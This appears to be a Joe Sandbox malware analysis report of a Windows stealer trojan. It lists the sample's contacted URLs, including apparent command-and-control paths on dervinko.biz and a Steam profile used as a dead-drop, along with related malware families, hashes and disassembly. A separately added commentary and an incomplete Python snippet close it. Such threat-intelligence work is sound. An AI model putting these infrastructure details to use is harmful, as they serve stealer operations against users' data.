                                                                                                                http://store.steampowered.com/subscriber_agreement/Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                                                  high
                                                                                                                  https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgGj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                                                    high
                                                                                                                    https://recaptcha.net/recaptcha/;Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • 0%, Virustotal, Browse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=enGj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                                                      high
                                                                                                                      https://steamcommunity.com/discussions/Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                                                        high
                                                                                                                        https://dervinko.biz/Up/bistAndAuditAlarmByHandleertaGj8P0mbklo.exe, 00000000.00000003.2145426350.00000000050CE000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2145176778.00000000050CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://store.steampowered.com/stats/Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                                                          high
                                                                                                                          https://medal.tvGj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • 0%, Virustotal, Browse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://broadcast.st.dl.eccdnx.comGj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                                                            high
                                                                                                                            https://store.steampowered.com/steam_refunds/Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                                                              high
                                                                                                                              http://x1.c.lencr.org/0Gj8P0mbklo.exe, 00000000.00000003.2145279946.00000000052ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://x1.i.lencr.org/0Gj8P0mbklo.exe, 00000000.00000003.2145279946.00000000052ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              https://steamcommunity.com/profiles/76561199609719039(Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002794000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchGj8P0mbklo.exe, 00000000.00000003.2108844417.0000000005138000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://dervinko.biz/Gj8P0mbklo.exe, 00000000.00000002.2152455570.00000000027B1000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000002.2152864496.000000000507F000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2151826752.000000000507F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • 0%, Virustotal, Browse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://steamcommunity.com/profiles/76561199609719039BGj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002794000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://steamcommunity.com/workshop/Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://login.steampowered.com/Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://store.steampowered.com/legal/Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=eGj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=tIrWyaxi8ABA&aGj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvGj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl76561199609719039[1].htm.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoGj8P0mbklo.exe, 00000000.00000003.2108844417.0000000005138000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://dervinko.biz/Up/byDllcGj8P0mbklo.exe, 00000000.00000003.2151751922.000000000509F000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2151712465.0000000005090000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://recaptcha.netGj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://store.steampowered.com/76561199609719039[1].htm.0.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwGj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gifGj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                                                                                          high
                                                                                                                                                          http://127.0.0.1:27060Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • 0%, Virustotal, Browse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://steamcommunity.com/profiles/76561199609719039/inventory/Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLhGj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=KyfgrihL0xta&l=eGj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://ac.ecosia.org/autocomplete?q=Gj8P0mbklo.exe, 00000000.00000003.2108844417.0000000005138000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
IP             | Domain              | Country        | ASN   | ASN Name         | Malicious
23.61.62.148   | steamcommunity.com  | United States  | 16625 | AKAMAI-ASUS      | false
104.21.13.203  | dervinko.biz        | United States  | 13335 | CLOUDFLARENETUS  | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1436772
Start date and time: 2024-05-06 15:19:09 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 18s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Gj8P0mbklo.exe (renamed because the original name is a hash value)
Original Sample Name: f7d15a3027d3a430511630c91898c72b91b5fb42bf99315cc5a5ef009a473835.exe
Detection: MAL
Classification: mal84.troj.spyw.winEXE@1/2@2/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 32
• Number of non-executed functions: 78
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                  No simulations
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
23.61.62.148 | onxLpsxpVP.exe | Get hash | malicious | Arc Stealer | Browse |
23.61.62.148 | file.exe | Get hash | malicious | Vidar | Browse |
23.61.62.148 | file.exe | Get hash | malicious | Vidar | Browse |
23.61.62.148 | file.exe | Get hash | malicious | Vidar | Browse |
23.61.62.148 | file.exe | Get hash | malicious | Vidar | Browse |
23.61.62.148 | https://steamfiller.ru/ | Get hash | malicious | Unknown | Browse |
23.61.62.148 | file.exe | Get hash | malicious | Vidar | Browse |
23.61.62.148 | https://steam.workshopfiledetail.com/sharedfiles/filedetails/m4a4_celestial_moon | Get hash | malicious | Unknown | Browse |
23.61.62.148 | 5zq2Yob8xh.exe | Get hash | malicious | GCleaner, Glupteba, Mars Stealer, Meduza Stealer, PureLog Stealer, RedLine, RisePro Stealer | Browse |
23.61.62.148 | file.exe | Get hash | malicious | Vidar | Browse |
104.21.13.203 | ss.exe | Get hash | malicious | CryptOne | Browse |
104.21.13.203 | https://2n8w.app.link/?~channel=Email&~feature=ConfirmationEmail--AtocETicket&~campaign=WebToApp&~tags=locale%3Den_GB&~tags=version%3D1&~tags=marketing_code%3DBSH3675&$android_url=https%3A%2F%2Fplay.google.com%2Fstore%2Fapps%2Fdetails%3Fid%3Dcom.thetrainline%26hl%3Den-GB&$android_deepview=false&$android_passive_deepview=false&$ios_url=https%3A%2F%2Fitunes.apple.com%2FGB%2Fapp%2Fthetrainline%2Fid334235181&$ios_deepview=false&$ios_passive_deepview=false&$fallback_url=https://denvercbdonline.com/img/new/cjgscb/miket@seprint.com | Get hash | malicious | HTMLPhisher | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
steamcommunity.com | onxLpsxpVP.exe | Get hash | malicious | Arc Stealer | Browse | 23.61.62.148
steamcommunity.com | https://www.steamvr.com/de/ | Get hash | malicious | Unknown | Browse | 104.71.182.190
steamcommunity.com | https://steamcommunitlu.com/ | Get hash | malicious | Unknown | Browse | 104.96.244.29
steamcommunity.com | BS4GDarWw6.exe | Get hash | malicious | Vidar | Browse | 23.66.133.162
steamcommunity.com | file.exe | Get hash | malicious | Vidar | Browse | 184.87.56.26
steamcommunity.com | file.exe | Get hash | malicious | Vidar | Browse | 104.105.90.131
steamcommunity.com | file.exe | Get hash | malicious | Vidar | Browse | 184.87.56.26
steamcommunity.com | tZvjMg3Hw9.exe | Get hash | malicious | PureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRAT | Browse | 104.105.90.131
steamcommunity.com | file.exe | Get hash | malicious | Vidar | Browse | 104.105.90.131
steamcommunity.com | WlCIinu0yp.exe | Get hash | malicious | LummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, Socks5Systemz, Vidar, zgRAT | Browse | 104.104.85.160
dervinko.biz | onxLpsxpVP.exe | Get hash | malicious | Arc Stealer | Browse | 172.67.133.22
dervinko.biz | ss.exe | Get hash | malicious | CryptOne | Browse | 172.67.133.22
dervinko.biz | ss.exe | Get hash | malicious | CryptOne | Browse | 104.21.13.203
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
AKAMAI-ASUS | onxLpsxpVP.exe | Get hash | malicious | Arc Stealer | Browse | 23.61.62.148
AKAMAI-ASUS | #U00d6deme makbuzu ektedir.docx.doc | Get hash | malicious | Unknown | Browse | 96.17.61.58
AKAMAI-ASUS | powershell.exe | Get hash | malicious | Unknown | Browse | 23.193.120.112
AKAMAI-ASUS | pDWZMd3100.elf | Get hash | malicious | Mirai, Gafgyt | Browse | 23.40.23.231
AKAMAI-ASUS | bot.arm6.elf | Get hash | malicious | Mirai | Browse | 96.16.159.21
AKAMAI-ASUS | https://www.steamvr.com/de/ | Get hash | malicious | Unknown | Browse | 23.50.124.114
AKAMAI-ASUS | https://steamcommunitlu.com/ | Get hash | malicious | Unknown | Browse | 23.50.124.114
AKAMAI-ASUS | BS4GDarWw6.exe | Get hash | malicious | Vidar | Browse | 23.66.133.162
AKAMAI-ASUS | PIO88938MB.docx.doc | Get hash | malicious | Unknown | Browse | 23.47.168.24
AKAMAI-ASUS | Copy of BARBOT CONSTRUCTION.xlsx | Get hash | malicious | HtmlDropper, HTMLPhisher | Browse | 69.192.108.161
CLOUDFLARENETUS | onxLpsxpVP.exe | Get hash | malicious | Arc Stealer | Browse | 172.67.133.22
CLOUDFLARENETUS | https://cj96332.tw1.ru/choruspro/choruspro/ | Get hash | malicious | HTMLPhisher | Browse | 1.1.1.1
CLOUDFLARENETUS | html.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 104.26.13.205
CLOUDFLARENETUS | heisgood.doc | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 172.67.74.152
CLOUDFLARENETUS | REQUEST FOR QUOTATION.docx.doc | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 172.67.74.152
CLOUDFLARENETUS | Order4500318042.xls | Get hash | malicious | FormBook, PureLog Stealer | Browse | 104.21.89.249
CLOUDFLARENETUS | #U00d6deme makbuzu ektedir.docx.doc | Get hash | malicious | Unknown | Browse | 104.21.89.249
CLOUDFLARENETUS | #U00d6deme makbuzu ektedir.docx.doc | Get hash | malicious | Unknown | Browse | 104.21.89.249
CLOUDFLARENETUS | FW_ New PO Acknowledgement From The Vankam Freightways.eml | Get hash | malicious | HTMLPhisher | Browse | 104.17.24.14
CLOUDFLARENETUS | https://www.autohotkey.com/download/ahk-v2.exe | Get hash | malicious | Unknown | Browse | 104.21.89.135
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
37f463bf4616ecd445d4a1937da06e19 | onxLpsxpVP.exe | Get hash | malicious | Arc Stealer | Browse | 23.61.62.148, 104.21.13.203
37f463bf4616ecd445d4a1937da06e19 | SecuriteInfo.com.NSIS.MalwareX-gen.17953.29383.exe | Get hash | malicious | GuLoader | Browse | 23.61.62.148, 104.21.13.203
37f463bf4616ecd445d4a1937da06e19 | EXP263 Grupa Decora ARKU8341370 1x40.exe | Get hash | malicious | GuLoader, Remcos | Browse | 23.61.62.148, 104.21.13.203
37f463bf4616ecd445d4a1937da06e19 | List of our requirements 06520204Fly Wing.vbs | Get hash | malicious | FormBook, GuLoader | Browse | 23.61.62.148, 104.21.13.203
37f463bf4616ecd445d4a1937da06e19 | EXP263 Decora Group ARKU8341370 1x40.exe | Get hash | malicious | GuLoader, Remcos | Browse | 23.61.62.148, 104.21.13.203
37f463bf4616ecd445d4a1937da06e19 | 73zGJqwgDy.exe | Get hash | malicious | MofongoLoader | Browse | 23.61.62.148, 104.21.13.203
37f463bf4616ecd445d4a1937da06e19 | J5kltefeTK.exe | Get hash | malicious | MofongoLoader | Browse | 23.61.62.148, 104.21.13.203
37f463bf4616ecd445d4a1937da06e19 | qxn9Zvy1at.exe | Get hash | malicious | MofongoLoader | Browse | 23.61.62.148, 104.21.13.203
37f463bf4616ecd445d4a1937da06e19 | R3vjRWX78A.exe | Get hash | malicious | MofongoLoader | Browse | 23.61.62.148, 104.21.13.203
37f463bf4616ecd445d4a1937da06e19 | Hy424UHYHW.exe | Get hash | malicious | MofongoLoader | Browse | 23.61.62.148, 104.21.13.203
No context
Process: C:\Users\user\Desktop\Gj8P0mbklo.exe
File Type: HTML document, Unicode text, UTF-8 text, with very long lines (2969), with CRLF, LF line terminators
Category: dropped
Size (bytes): 34789
Entropy (8bit): 5.386073524863294
Encrypted: false
SSDEEP: 768:/dpqm+0Ih3YAA9CWGEmfcDAfPzzgiJmDzJtxvrfJkPVoEAdmPzzgiJmDzJtxvJ2w:/d8m+0Ih3YAA9CWGEmFfPzzgiJmDzJtT
MD5: A3CECEDB9036A82F050828BAA42E21D0
SHA1: B4DE8B997C26E3CEAEB0C647B593E131E21BC6DB
SHA-256: 75F75C4403BFE3AFD61DDF8898252F488713CE759C5B3E08AD15657158912B6C
SHA-512: 7BA36300556F6BD255A6D414C70C032C276A72558F1457BEF08537B5A640A50D50C9A124736638696812A19A23C01722F4013DC96746567063053FC9A5C00949
Malicious: false
Reputation: low
Preview: <!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: 3e3 aHR0cHM6Ly9kZXJ2aW5rby5iaXo=</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<lin

Process: C:\Users\user\Desktop\Gj8P0mbklo.exe
File Type: ASCII text, with very long lines (47680), with no line terminators
Category: dropped
Size (bytes): 47680
Entropy (8bit): 5.362966359018906
Encrypted: false
SSDEEP: 768:vzsNZzFhOnDMIf19+kXSV0brSxnb22fnc6KWWhv6GYcnvabaMi9idvbU0nagalQb:v0zPO9f1ouYgLvRMymbU0ni4xKjo
MD5: 0B236AC4395E5E40F5AB3140CB892115
SHA1: 9AC2290905D9996E95291C84E14FF1006BFEE483
                                                                                                                                                                                          SHA-256:ECB0B0F87288C16207310A58C67A25AC557A54FA328E74F592C051F1C44176FB
                                                                                                                                                                                          SHA-512:87422C27CD7039C6A15CE32DE54E7733075F000A099191BE456594F2730F25559BB32862FE189159C2A8FADB3A52C863E052A44F66CE3CA24968A95FCE4F7E09
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
Preview:
                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Entropy (8bit):6.621191048042736
                                                                                                                                                                                          TrID:
                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                          File name:Gj8P0mbklo.exe
                                                                                                                                                                                          File size:362'496 bytes
                                                                                                                                                                                          MD5:bad3fa5127efcc9c678c5d71fce0d0b2
                                                                                                                                                                                          SHA1:c5f49dd54b71eaf4e1ba3a9fdfc51c7fb8afbea8
                                                                                                                                                                                          SHA256:f7d15a3027d3a430511630c91898c72b91b5fb42bf99315cc5a5ef009a473835
                                                                                                                                                                                          SHA512:5b6d5efa4dcf49a43e992652194d45a407e9482dcd21ff887ae709a98944c21d6b7ea67dc518493c0416e3fd2ee38ed0f02c3b75a762b6784af14f0ce69e78ab
                                                                                                                                                                                          SSDEEP:6144:5OvAYHNayUljnWrd+VKTEK/AeI8eajd8j4xET4YAOqz/B:5mjNadljnWrd+V0EXzS+4CTNo7B
                                                                                                                                                                                          TLSH:81747E11F182C032D4A202B11A65EFB696BCA93057A29CEF6BD05E7BDD342D26531F37
                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K...............D.......D.......D.......@...D...@.......@.......D.......................................Rich...................
                                                                                                                                                                                          Icon Hash:00928e8e8686b000
                                                                                                                                                                                          Entrypoint:0x425140
                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP
                                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                          Time Stamp:0x66115E48 [Sat Apr 6 14:38:00 2024 UTC]
                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                          OS Version Major:6
                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                          File Version Major:6
                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                          Subsystem Version Major:6
                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                          Import Hash:2897cecb00338038ddfd70ec9000340f
                                                                                                                                                                                          Instruction
                                                                                                                                                                                          call 00007FBA6CC321B0h
                                                                                                                                                                                          jmp 00007FBA6CC31B6Eh
                                                                                                                                                                                          and dword ptr [ecx+04h], 00000000h
                                                                                                                                                                                          mov eax, ecx
                                                                                                                                                                                          and dword ptr [ecx+08h], 00000000h
                                                                                                                                                                                          mov dword ptr [ecx+04h], 00446568h
                                                                                                                                                                                          mov dword ptr [ecx], 00446560h
                                                                                                                                                                                          ret
                                                                                                                                                                                          push ebp
                                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                                          sub esp, 0Ch
                                                                                                                                                                                          lea ecx, dword ptr [ebp-0Ch]
                                                                                                                                                                                          call 00007FBA6CC31CDFh
                                                                                                                                                                                          push 0045527Ch
                                                                                                                                                                                          lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                          push eax
                                                                                                                                                                                          call 00007FBA6CC33095h
                                                                                                                                                                                          int3
                                                                                                                                                                                          push ebp
                                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                                          and dword ptr [00458278h], 00000000h
                                                                                                                                                                                          sub esp, 24h
                                                                                                                                                                                          or dword ptr [0045700Ch], 01h
                                                                                                                                                                                          push 0000000Ah
                                                                                                                                                                                          call dword ptr [00446070h]
                                                                                                                                                                                          test eax, eax
                                                                                                                                                                                          je 00007FBA6CC31EB2h
                                                                                                                                                                                          and dword ptr [ebp-10h], 00000000h
                                                                                                                                                                                          xor eax, eax
                                                                                                                                                                                          push ebx
                                                                                                                                                                                          push esi
                                                                                                                                                                                          push edi
                                                                                                                                                                                          xor ecx, ecx
                                                                                                                                                                                          lea edi, dword ptr [ebp-24h]
                                                                                                                                                                                          push ebx
                                                                                                                                                                                          cpuid
                                                                                                                                                                                          mov esi, ebx
                                                                                                                                                                                          pop ebx
                                                                                                                                                                                          nop
                                                                                                                                                                                          mov dword ptr [edi], eax
                                                                                                                                                                                          mov dword ptr [edi+04h], esi
                                                                                                                                                                                          mov dword ptr [edi+08h], ecx
                                                                                                                                                                                          xor ecx, ecx
                                                                                                                                                                                          mov dword ptr [edi+0Ch], edx
                                                                                                                                                                                          mov eax, dword ptr [ebp-24h]
                                                                                                                                                                                          mov edi, dword ptr [ebp-20h]
                                                                                                                                                                                          mov dword ptr [ebp-0Ch], eax
                                                                                                                                                                                          xor edi, 756E6547h
                                                                                                                                                                                          mov eax, dword ptr [ebp-18h]
                                                                                                                                                                                          xor eax, 49656E69h
                                                                                                                                                                                          mov dword ptr [ebp-04h], eax
                                                                                                                                                                                          mov eax, dword ptr [ebp-1Ch]
                                                                                                                                                                                          xor eax, 6C65746Eh
                                                                                                                                                                                          mov dword ptr [ebp-08h], eax
                                                                                                                                                                                          xor eax, eax
                                                                                                                                                                                          inc eax
                                                                                                                                                                                          push ebx
                                                                                                                                                                                          cpuid
                                                                                                                                                                                          mov esi, ebx
                                                                                                                                                                                          pop ebx
                                                                                                                                                                                          nop
                                                                                                                                                                                          lea ebx, dword ptr [ebp-24h]
                                                                                                                                                                                          mov dword ptr [ebx], eax
                                                                                                                                                                                          mov eax, dword ptr [ebp-04h]
                                                                                                                                                                                          or eax, dword ptr [ebp-08h]
                                                                                                                                                                                          or eax, edi
                                                                                                                                                                                          mov dword ptr [ebx+04h], esi
                                                                                                                                                                                          mov dword ptr [ebx+08h], ecx
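The sequence above, two cpuid invocations with the leaf-0 results XORed against 756E6547h, 49656E69h and 6C65746Eh and then ORed together, is what trips the "query CPU information (cpuid)" signature. Read as the little-endian bytes they occupy in memory, those immediates spell "Genu", "ineI" and "ntel", so the block is a GenuineIntel vendor test (cpuid leaf 0 returns the vendor id in EBX, EDX, ECX in that order). The call just before it passes 0Ah through the IAT slot at 00446070h; that slot is the 29th entry of the IAT at 0x46000, which in the KERNEL32 import list further down is IsProcessorFeaturePresent, and 0Ah is PF_XMMI64_INSTRUCTIONS_AVAILABLE (the SSE2 check). Taken together this is the ISA-availability initialisation that the MSVC C runtime compiles into every startup, so this particular cpuid use is compiler boilerplate for feature dispatch rather than evidence of sandbox evasion; the listing stops before the leaf-1 family/model comparison that follows in that routine. The following added example (not from the report or the sample) decodes the constants and replays the check on constructed register values.

```python
import struct

# Immediates taken from the entrypoint disassembly above.
XOR_GENU = 0x756E6547   # xor edi, 756E6547h   (edi holds EBX from cpuid leaf 0)
XOR_INEI = 0x49656E69   # xor eax, 49656E69h   (eax holds EDX from cpuid leaf 0)
XOR_NTEL = 0x6C65746E   # xor eax, 6C65746Eh   (eax holds ECX from cpuid leaf 0)


def dword_to_ascii(value: int) -> str:
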